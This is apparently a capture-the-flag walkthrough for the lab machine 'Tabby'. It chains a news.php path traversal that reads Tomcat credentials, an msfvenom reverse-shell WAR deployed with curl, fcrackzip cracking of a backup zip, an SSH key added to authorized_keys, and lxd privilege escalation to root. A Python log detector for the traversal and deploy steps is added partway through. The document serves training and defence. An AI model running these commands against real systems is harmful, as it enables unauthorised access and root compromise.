
Tabby Walkthrough

----------------------------------------
Enumerating port 80 we find a new subdomain, megahosting.htb.
Add it to your hosts file at /etc/hosts:

10.10.10.194 tabby.htb megahosting.htb

Foothold
----------------------------------------
There is an LFI at http://megahosting.htb/news.php?file=
Requesting something like http://megahosting.htb/news.php?file=../../../../../etc/hosts
shows that we get directory traversal.

Looking at port 8080 we find it is Tomcat 9, and its default page mentions that /etc/tomcat9/tomcat-users.xml
holds the user info. Reading that path through the LFI returns nothing, so we need the correct path.

After some research we find the correct path is /usr/share/tomcat9/etc/tomcat-users.xml

So just do http://megahosting.htb/news.php?file=../../../../../usr/share/tomcat9/etc/tomcat-users.xml and get the creds:
```
<user username="tomcat" password="$3cureP4s5w0rd123!" roles="admin-gui,manager-script"/>
```
Using the above credentials we can access the Host Manager GUI.

Reverse Shell
------------------------------------------
Tomcat lets us gain a reverse shell by uploading our payload as a .war file. We can use curl to upload
it to the webroot.

First craft the payload with msfvenom:

```
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.X.X LPORT=1234 -f war > payload.war
```
To upload, just do (one command; the URL is continued onto the second line):

```
curl --user 'tomcat:$3cureP4s5w0rd123!' --upload-file payload.war \
  "http://10.10.10.194:8080/manager/text/deploy?path=/payload.war"
```
Set up a listener with nc -lvnp 1234 and browse to tabby.htb:8080/payload.war, and you should get a reverse
shell.

To upgrade tty just do python3 -c 'import pty; pty.spawn("/usr/bin/bash")'
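
From the defender's side, the two web-facing steps above (traversal through the news.php file parameter to reach tomcat-users.xml, then a WAR deploy through the Manager text interface) both leave clear traces in the web server's access log. The following detector is an added example, not part of the original walkthrough; it assumes Apache/Tomcat combined log format, and the log lines it scans are constructed samples, not captures from the machine.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qsl

# Combined log format:  client ident user [time] "METHOD target PROTO" status bytes  (assumed)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Files the LFI on this box was used to read, plus the usual first target of any LFI probe
SENSITIVE = ("/etc/passwd", "/etc/hosts", "tomcat-users.xml")

# Constructed sample lines mirroring the steps in the walkthrough (not real captures)
SAMPLE_LOG = [
    '10.10.14.5 - - [10/Jul/2020:10:00:01 +0000] "GET /news.php?file=statement HTTP/1.1" 200 1234',
    '10.10.14.5 - - [10/Jul/2020:10:00:07 +0000] "GET /news.php?file=../../../../../etc/hosts HTTP/1.1" 200 312',
    '10.10.14.5 - - [10/Jul/2020:10:00:15 +0000] "GET /news.php?file=..%2F..%2F..%2F..%2F..%2Fusr/share/tomcat9/etc/tomcat-users.xml HTTP/1.1" 200 2048',
    '10.10.14.5 - - [10/Jul/2020:10:02:30 +0000] "PUT /manager/text/deploy?path=/payload.war HTTP/1.1" 200 60',
]


def classify(line):
    """Return the sorted alert tags for one log line (empty list when nothing suspicious)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsed"]
    parts = urlsplit(m.group("target"))
    alerts = set()
    for _, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl decoded once already; decode again so double encoding (%252e%252e%252f) is caught
        value = unquote(value)
        if "../" in value or "..\\" in value:
            alerts.add("traversal")
        if any(value.endswith(name) for name in SENSITIVE):
            alerts.add("sensitive-file")
    # Any hit on the Manager text deploy endpoint is a deployment (curl --upload-file sends a PUT)
    if "/manager/text/deploy" in unquote(parts.path):
        alerts.add("tomcat-deploy")
    return sorted(alerts)


def scan(lines):
    """Map line index -> alert tags for every line that fired at least one alert."""
    return {i: tags for i, tags in ((i, classify(l)) for i, l in enumerate(lines)) if tags}


if __name__ == "__main__":
    for i, tags in scan(SAMPLE_LOG).items():
        print(i, tags, SAMPLE_LOG[i].split('"')[1])
```

A 200 on the tomcat-users.xml read followed within minutes by a deploy from the same client, as in the sample, is the whole foothold chain in two log lines.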

Privesc to User Ash
------------------------------------------
Enumerating we find a zip file belonging to ash at /var/www/html/files/backup_<somenumber>.zip
(sorry, don't remember the correct name).

So we copied it over by running base64 backupfilename.zip on the target, and on our local machine
echo "<paste base64 code>" | base64 -d > backup.zip

We see it asks for a password, so we can brute-force it with fcrackzip:

```
fcrackzip -v -D -u -p ./rockyou.txt backup.zip
```
which returns the password: admin@it

Testing it via su ash we get access as ash and can read user.txt.

Privesc to Root
-------------------------------------------------
We see that ash is part of the lxd group. So, following the article https://www.hackingarticles.in/lxd-privilege-escalation/, we just follow the steps and get root.

On your local machine do:

```
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
```

You will get a tar.gz file. Set up an HTTP server and copy it to the remote machine.

On the remote machine, first add your SSH public key to /home/ash/.ssh/authorized_keys:

```
echo "<your public key here>" >> authorized_keys
```

Then log in with ssh ash@tabby.htb

Once logged in, go to any dir you have write access to and do

```
wget yourip/filename.tar.gz
```
Then just do the following in order

```
lxc image import ./yourfilename.tar.gz --alias myimage
lxc image list   # this should show that your image got loaded
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh

cd /mnt/root
cd /root/
cat root.txt
```
You can also get root's RSA key from /root/.ssh/id_rsa.
